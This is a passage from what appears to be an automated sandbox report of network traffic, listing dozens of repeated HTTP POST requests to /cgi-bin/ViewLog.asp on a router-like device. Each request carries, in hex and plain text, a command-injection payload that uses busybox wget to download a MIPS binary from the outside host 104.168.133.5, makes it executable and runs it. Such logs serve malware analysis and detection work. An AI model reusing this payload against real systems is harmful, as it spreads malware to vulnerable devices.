                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:01.129167080 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:10.088815928 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.520153046 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.382479906 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192.168.2.145867485.122.216.2128080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.472630024 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192.168.2.143506831.136.201.2238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.867726088 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:53.449465036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:54.569466114 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:57.033327103 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:01.641141891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:10.600779057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.520061970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.382539034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10192.168.2.144737094.187.100.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.901355982 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192.168.2.144267894.122.83.928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.909058094 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192.168.2.144820494.122.85.278080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.909296989 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              13192.168.2.144896294.121.23.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.923451900 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              14192.168.2.145753031.136.28.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.250679970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:56.265356064 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:02.409096956 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:14.440742016 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.759844065 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:27.909646988 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              15192.168.2.144751694.121.186.1578080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.284506083 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16192.168.2.143662494.122.6.458080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.284661055 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17192.168.2.144880494.122.104.1688080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:53.288228035 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
